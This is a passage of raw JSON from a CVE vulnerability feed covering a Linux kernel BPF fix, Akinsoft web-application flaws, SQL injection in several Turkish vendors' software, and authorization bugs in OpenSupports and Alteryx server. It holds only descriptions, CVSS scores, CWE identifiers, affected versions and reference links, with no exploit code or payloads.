Para solucionar este problema, necesitamos extender bpf_map_owner con una matriz de storage_cookie[] para que coincida con i) los mapas exactos del programa original si el segundo programa usaba bpf_get_local_storage(), o ii) permitir la combinación de llamadas de cola si el segundo programa no usaba ninguno de los mapas de almacenamiento local de cgroup."}],"metrics":{"cvssMetricV31":[{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H","baseScore":7.1,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":1.8,"impactScore":5.2}]},"weaknesses":[{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-125"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"5.9","versionEndExcluding":"5.15.192","matchCriteriaId":"49EEF657-80AD-46E2-8CA5-C96EFA630696"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"5.16","versionEndExcluding":"6.1.151","matchCriteriaId":"BC2D0B88-F133-4143-B91D-0A439AA143C0"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.2","versionEndExcluding":"6.6.105","matchCriteriaId":"B9364B0C-6B18-422E-8254-73EF0E856875"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.7","versionEndExcluding":"6.12.46","matchCriteriaId":"F7E2B332-E920-4CAC-B400-288602DB6F16"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.13","versionEndExcluding":"6.16.1","matchCriteriaId":"8B9C94BD-76DF-42B9-9A0B-04DACF7CBE8F"}]}]},{"nodes":[{"operator
":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*","matchCriteriaId":"FA6FEEC2-9F11-4643-8827-749718254FED"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:siemens:simatic_cn_4100_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"5.0","matchCriteriaId":"AA9D4F6E-9336-4026-B485-4227C861B356"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:siemens:simatic_cn_4100:-:*:*:*:*:*:*:*","matchCriteriaId":"92619F5F-3679-4424-9455-3285FF1EF2F1"}]}]}],"references":[{"url":"https://git.kernel.org/stable/c/19341d5c59e8c7e8528e40f8663e99d67810473c","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/41688d1fc5d163a6c2c0e95c0419e2cb31a44648","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/66da7cee78590259b400e51a70622ccd41da7bb2","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/7acfa07c585e3d7a64654d38f0a5c762877d0b9b","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/abad3d0bad72a52137e0c350c59542d75ae4f513","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/c1c74584b9b4043c52e41fec415226e582d266a3","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://lists.debian.org/debian-lts-announce/2025/10/msg00008.html","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Mailing List","Third Party Advisory"]},{"url":"https://cert-portal.siemens.com/productcert/html/ssa-032379.html","source":"0b142b55-0307-4c5a-b3c9-f314f3fb7c5e","tags":["Third Party 
Advisory"]}]}},{"cve":{"id":"CVE-2024-12924","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-09-01T13:15:32.897","lastModified":"2026-06-01T13:16:25.447","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Akınsoft QR Menü allows Forceful Browsing, Phishing.\n\nThis issue affects QR Menü: from s1.05.05 before v1.05.12."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L","baseScore":6.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":2.8,"impactScore":3.4}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-601"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0202","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0202","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-12925","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-09-01T13:15:33.100","lastModified":"2026-06-01T13:16:25.590","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Validation of Certificate with Host Mismatch vulnerability in Akınsoft QR Menü allows HTTP Response Splitting.\n\nThis issue affects QR Menü: from s1.05.05 before 
v1.05.12."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L","baseScore":7.3,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":3.9,"impactScore":3.4}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-297"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0202","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0202","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-12972","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-09-02T12:15:34.327","lastModified":"2026-06-01T13:16:26.160","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Akinsoft OctoCloud allows Cross-Site Scripting (XSS).\n\nThis issue affects OctoCloud: from s1.09.01 before 
v1.11.01."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":0.9,"impactScore":3.4}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0203","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0203","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-12973","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-09-02T12:15:35.240","lastModified":"2026-06-01T13:16:26.267","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Origin Validation Error vulnerability in Akinsoft OctoCloud allows HTTP Response Splitting, CAPEC - 87 - Forceful Browsing.\n\nThis issue affects OctoCloud: from s1.09.01 before 
v1.11.01."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L","baseScore":4.7,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":1.2,"impactScore":3.4}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-346"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0203","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0203","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-12974","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-09-02T14:15:33.170","lastModified":"2026-06-01T13:16:26.390","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Akinsoft ProKuaför allows Cross-Site Scripting (XSS).\n\nThis issue affects ProKuaför: from s1.02.07 before 
v1.02.08."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":0.9,"impactScore":3.4}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0204","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0204","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-13063","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-09-03T09:15:33.343","lastModified":"2026-06-01T13:16:26.500","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Authorization Bypass Through User-Controlled Key vulnerability in Akinsoft MyRezzta allows Forceful Browsing.\n\nThis issue affects MyRezzta: from s2.02.02 before 
v2.05.01."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L","baseScore":6.8,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":2.1,"impactScore":4.7}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-639"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0205","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0205","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-13064","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-09-03T09:15:33.567","lastModified":"2026-06-01T13:16:26.610","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Akinsoft MyRezzta allows Cross-Site Scripting (XSS).\n\nThis issue affects MyRezzta: from s2.02.02 before 
v2.05.01."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":0.9,"impactScore":3.4}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0205","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0205","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-13065","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-09-03T09:15:33.810","lastModified":"2026-06-01T13:16:26.710","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Enforcement of Behavioral Workflow, Uncontrolled Resource Consumption vulnerability in Akinsoft MyRezzta allows Input Data Manipulation, CAPEC - 125 - Flooding.\n\nThis issue affects MyRezzta: from s2.02.02 before 
v2.05.01."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L","baseScore":6.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":2.8,"impactScore":3.4}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-400"},{"lang":"en","value":"CWE-841"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0205","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0205","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-13066","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-09-03T13:15:46.243","lastModified":"2026-06-01T13:16:26.810","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Restriction of Rendered UI Layers or Frames vulnerability in Akinsoft LimonDesk allows iFrame Overlay, CAPEC - 103 - Clickjacking.\n\nThis issue affects LimonDesk: from s1.02.14 before 
v1.02.17."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":0.9,"impactScore":3.4}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-1021"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0206","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0206","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-13068","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-09-03T14:15:42.403","lastModified":"2026-06-01T13:16:26.937","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Origin Validation Error vulnerability in Akinsoft LimonDesk allows Forceful Browsing.\n\nThis issue affects LimonDesk: from s1.02.14 before 
v1.02.17."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L","baseScore":7.3,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":3.9,"impactScore":3.4}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-346"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0206","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0206","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-13071","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-09-04T10:42:24.347","lastModified":"2026-06-01T13:16:27.077","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Akinsoft e-Mutabakat allows Cross-Site Scripting (XSS).\n\nThis issue affects e-Mutabakat: from 2.02.05 before 
v2.02.06."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":0.9,"impactScore":3.4}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0207","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0207","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-13073","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-09-04T10:42:25.387","lastModified":"2026-06-01T13:16:27.227","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Akinsoft TaskPano allows Cross-Site Scripting (XSS).\n\nThis issue affects TaskPano: 
s1.06.04."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L","baseScore":4.7,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":1.2,"impactScore":3.4}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0208","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0208","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-13149","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-09-16T15:15:42.533","lastModified":"2026-06-01T13:16:27.630","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'), CWE - 200 - Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Arma Store Armalife allows SQL Injection.\n\nThis issue affects Armalife: through 20250916. \n\nNOTE: The vendor did not inform about the completion of the fixing process within the specified time. 
The CVE will be updated when new information becomes available."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0258","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0258","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-13174","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-09-16T15:15:42.707","lastModified":"2026-06-01T13:16:28.077","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in E1 Informatics Web Application allows SQL Injection.\n\nThis issue affects Web Application: through 20250916. \n\nNOTE: The vendor did not inform about the completion of the fixing process within the specified time. 
The CVE will be updated when new information becomes available."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L","baseScore":8.6,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":3.9,"impactScore":4.7}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0259","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0259","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-13151","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-09-18T12:15:36.260","lastModified":"2026-06-01T13:16:27.857","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"CWE - 89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ESBI Information and Telecommunication Industry and Trade Limited Company Auto Service Software allows SQL Injection.\n\nThis issue affects Auto Service Software: before 
v.2025.10.01."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0273","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0273","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-13150","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-09-29T13:15:45.320","lastModified":"2026-06-01T13:16:27.743","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Fayton Software and Consulting Services fayton.Pro ERP allows SQL Injection.\n\nThis issue affects fayton.Pro ERP: through 
20250929."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0304","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0304","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2025-10696","sourceIdentifier":"help@fluidattacks.com","published":"2025-10-03T21:15:33.503","lastModified":"2026-06-01T12:22:50.817","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"OpenSupports exposes an endpoint that allows the list of 'supervised users' for any account to be edited, but it does not validate whether the actor is the owner of that list. A Level 1 staff member can modify the supervision relationship of a third party (the target user), who can then view the tickets of the added 'supervised' users. 
This breaks the authorization model and filters the content of other users' tickets.This issue affects OpenSupports: 4.11.0."}],"metrics":{"cvssMetricV40":[{"source":"help@fluidattacks.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":7.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"
exploitabilityScore":2.8,"impactScore":2.5}]},"weaknesses":[{"source":"help@fluidattacks.com","type":"Secondary","description":[{"lang":"en","value":"CWE-863"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:opensupports:opensupports:4.11.0:*:*:*:*:*:*:*","matchCriteriaId":"79B3C4CE-1AEE-44B6-BDEC-726B28A99A89"}]}]}],"references":[{"url":"https://fluidattacks.com/advisories/stratovarius","source":"help@fluidattacks.com","tags":["Exploit","Third Party Advisory"]},{"url":"https://github.com/opensupports/opensupports","source":"help@fluidattacks.com","tags":["Product"]},{"url":"https://fluidattacks.com/advisories/stratovarius","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","tags":["Exploit","Third Party Advisory"]}]}},{"cve":{"id":"CVE-2025-63291","sourceIdentifier":"cve@mitre.org","published":"2025-11-14T19:16:01.163","lastModified":"2026-06-01T12:22:13.450","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"When processing API requests, the Alteryx server 2022.1.1.42654 and 2024.1 used MongoDB object IDs to uniquely identify the data being requested by the caller. The Alteryx server did not check whether the authenticated user had permission to access the specified MongoDB object ID. By specifying particlar MongoDB object IDs, callers could obtain records for other users without proper authorization. 
